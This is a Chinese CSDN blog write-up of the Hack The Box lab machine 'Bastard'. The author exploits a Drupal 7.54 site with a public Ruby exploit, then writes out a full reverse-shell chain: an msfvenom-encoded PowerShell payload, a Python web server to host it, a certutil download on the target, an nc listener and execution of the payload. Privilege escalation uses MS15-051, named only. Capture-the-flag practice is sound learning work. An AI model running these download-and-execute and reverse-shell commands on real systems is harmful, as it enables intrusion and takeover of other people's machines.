【Hack The Box】windows练习-- Bastard

最新推荐文章于 2024-07-20 23:14:06 发布
最新推荐文章于 2024-07-20 23:14:06 发布
阅读量812 收藏
点赞数
分类专栏: Hack The Box 文章标签: windows 服务器 运维 Hack The Box
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/127584544
版权

HTB 学习笔记

【Hack The Box】windows练习-- Bastard

🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年10月29日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

信息收集

在这里插入图片描述
发现了一些敏感的文件,打开发现了cms的版本信息
在这里插入图片描述于是进行谷歌搜索:drupal 7.54 exp

先安装必要环境
sudo gem install highline

然后,运行漏洞利用:

ruby 44449.rb http://10.10.10.9

在这里插入图片描述这是用法解释
在这里插入图片描述
而后得到了一个不稳定的shell

在这里插入图片描述
可以看到获取不到systeminfo的补丁信息,说明我们挑一个对应系统的内核漏洞提权即可

反弹shell

msfvenom -p windows/x64/powershell_reverse_tcp LHOST=kali-vpn-ip LPORT=kali-tcp-port -a x64 --platform windows -e x64/xor_dynamic -b '\x00' -f exe -o shell.exe
sudo python3 -m http.server 80
certutil.exe -urlcache -split -f http://kali-vpn-ip/shell.exe C:\Windows\Temp\shell.exe
sudo nc -lnvp <kali-tcp-port>
cmd.exe /c C:\Windows\Temp\shell.exe

在这里插入图片描述

但是不能正常运行winpeas
所以

在这里插入图片描述

在这里我却无法使用winpeas来进行枚举
但是由于没有任何的补丁,所以这个系统的内核是非常不安全的,

在这里插入图片描述
所以我选择了ms15-051
传上去利用即可

利用这个靶场我进行了许多漏洞枚举的尝试,但是基本都失败了,原因是net版本太低无法使用winpeas,以及许多其他的问题
我将再次尝试

人间体佐菲
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
No.53-HackTheBox-windows-Bastard-Walkthrough渗透学习
qq_34801745的博客
02-13 1006
** HackTheBox-windows-Bastard-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/6 靶机难度:中等(4.7/10) 靶机发布日期:2017年10月14日 靶机描述: Bastard is not overly challenging, however it requires some...
Hackthebox::Bastard walkthrough
Soul Blog
12-04 187
Bastard Bastardhackthebox上一台难度中等的windows靶机 信息收集 nmap进行端口扫描,首先扫描前100个容易受到攻击的端口 nmap进行更细致的扫描 nmap扫描是否存在漏洞 至此,nmap向我们反馈了有用的信息: 80 http 135 msrpc 49154 open unknow 登录80端口,查看网页信息 我们从网页底部可以知道这个CMS是drupal系统,但是我们不知道他的具体版本 接下来使用dirsearch进行目录扫描,我尝
Hack the box靶机 Bastard
菜浪马废的博客
06-03 289
修改几处地方 准备用nc连接
hackthebox-bastard (考点drupal&Windows版本提权)
冬萍子癸水
04-08 500
nmap 80端口看看网页 是drupal 这是个典型考点,如果这个版本有漏洞的话DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)。没有就不行了,比如参考htb另一台靶机hawk,只能找到账号密码登录才行。 先可以用https://github.com/dreadlocked/Drupalgeddon2 ruby drupalge...
Hackthebox:Bastard Walkthrough(not use metasploit)
汗的博客
12-08 355
HacktheboxBastard Walkthrough(not use metasploit) 预备知识 dirbuster、nmap、Wappalyzer php 反序列化、Drupal7.x RCE、php-curl certutil、MS15-051 信息收集和获取立足点 nmap 10.10.10.9 结果如下 Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-07 15:16 CST Nmap scan report for 10.10.1
The Bastard-开源
04-15
The Bastard:开源Linux平台的反汇编神器》 在信息技术领域,了解底层操作机制是至关重要的,而反汇编器就是连接高级语言与机器语言的桥梁。今天我们要介绍的是一款名为"The Bastard"的开源反汇编程序,特别针对...
Thin-Bastard
05-07
Thin Bastard是的叉子 博客平台的主题。 #西班牙语 演示版 Puedes entrar个人情景语言: 使用混蛋主题 将主题文件夹复制到Ghost的/content/themes内。 重新启动Ghost,然后转到Ghost的设置( )。 从主题下拉...
mean-bastard:MEAN种子项目
06-26
卑鄙的混蛋![卑鄙的混蛋] ( ) 一个小的 MEAN 种子项目先决条件MongoDB 节点凉亭结构 .... └── server_config.json├── data│ ├── db│ └── fixtures├── server│ ├── model│ └── routes├─...
Bastard Operator Script Set-开源
05-03
一组可移植的shell / perl脚本,可以用作“标准操作符”。 只需稍加修改,它们就可以在大多数* nix平台上运行。 它们仅用于办公室中的小恶作剧,而不用于破坏性用途。 事情包括重新路由
第十八章——内网渗透之域渗透
L18296069161的博客
12-21 465
773617250渗透学习交流群,进群可领取一套完整学习工具,群内定期通知参加直播课程,直播时间可与老师进行互动。感谢大家的支持! MSF 在讲域渗透之前,先给大家讲讲MSF ●kali代理配置 http://pawelli.com/archives/527 ●回顾msf知识 ●针对内网 批量扫描 ms17-010 ●针对域成员 08R2 msf渗透 并提权 要点:针对对方是x64的架构 生成...
内网渗透之Windows反弹shell(三)
墨鱼菜鸡
09-10 330
目录 Windows反弹shell 06Powershell.exe 通过PowerShell发起Powercat攻击 通过Web Delivery反弹shell 通过powershell启动cscript.exe 通过powershell启动bat文件 通过powershell启动exe文件 内网渗透之Windows反弹shell(四)...
内网渗透之Windows反弹shell(一)
不知名白帽的博客
07-08 2010
内网渗透之Windows反弹shell(一)(反向shell简介、Windows反弹shell)
【渗透笔记】windows反弹shell方法大全
白菜猪肉炖粉条
01-06 1863
正向shell: 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。 反向shell(反弹shell): 被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口 被占用等问题导致被控端不能正常接收发送过来的数据包。 nc nc正向shell 被控端: nc -lvvp 6666 -e cmd.exe 开启监听 控制端: nc 192.168.1.62 6666 此原理就是,被控端将cmd.exe重定向到本地的6666端口,控制端主动连接被控端的6666端口,即可获得sh
Java小技能:多级组织机构排序并返回树结构(包含每个层级的子节点和业务数据集合)
iOS逆向与安全
07-17 1177
包含每个层级的子节点和业务数据集合。
Web前端-Web开发HTML基础2-list
a15735748145a的博客
07-16 382
13. 写一个列表标签,生成一个自定义列表,名称为"自定义列表",有三条记录,默认都为"记录",每个记录各有一个注释,默认为"注释";14. 写一个列表标签,生成一个自定义列表,名称为"自定义列表",有四条记录,默认都为"记录",每个记录各有两个注释,默认为"注释";15. 写一个列表标签,生成一个自定义列表,名称为"自定义列表",有五条记录,默认都为"记录",每个记录各有三个注释,默认为"注释";11. 写一个列表标签,生成一个有四条有初始值记录的有序列表;5. 自定义列表项dt标签有没有结束标签呢?
编写一款2D CAD/CAM软件(二十一)生产ASCII ART Logo
Arthur...J的博客
07-20 33
发挥你的想象力、艺术创造力,在各种位图编辑软件中生产软件Logo的位图,例如位图名称为logo.png.然后打开ascii.txt文件,查看根据位图生成的ASCII ART Logo.利用QCommandLineParser来显示ASCII ART Logo.1) 安装jp2a工具:sudo apt install jp2a。
Collections.unmodifiableList
我这个代码你能看懂吗?
07-17 478
以上方法都可以用来复制一个List,具体选择哪种方法取决于你的需求和使用场景。如果你需要一个简单的、快速的复制,可以使用ArrayList构造函数或addAll方法。如果你需要更灵活的操作,可以考虑使用stream和。
Qt创建列表,通过外部按钮控制列表的选中下移、上移以及左侧图标的显现
肩上风骋的博客
07-17 656
项目中需要使用列表QListWidget,但是不能直接拿来使用。需要创建一个列表,通过向上和向下的按钮来向上或者向下移动选中列表项,当当前项背选中再去点击确认按钮,会在列表项的前面出现一个图标。
vant IndexBar 索引不跟随页面滚动,IndexBar城市选择组件
最新发布
qq_35430000的博客
07-20 98
vant 城市选择组件
python中的fire和Linux shell中的参数传递
Richardlygo的博客
07-20 529
Hi, John!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值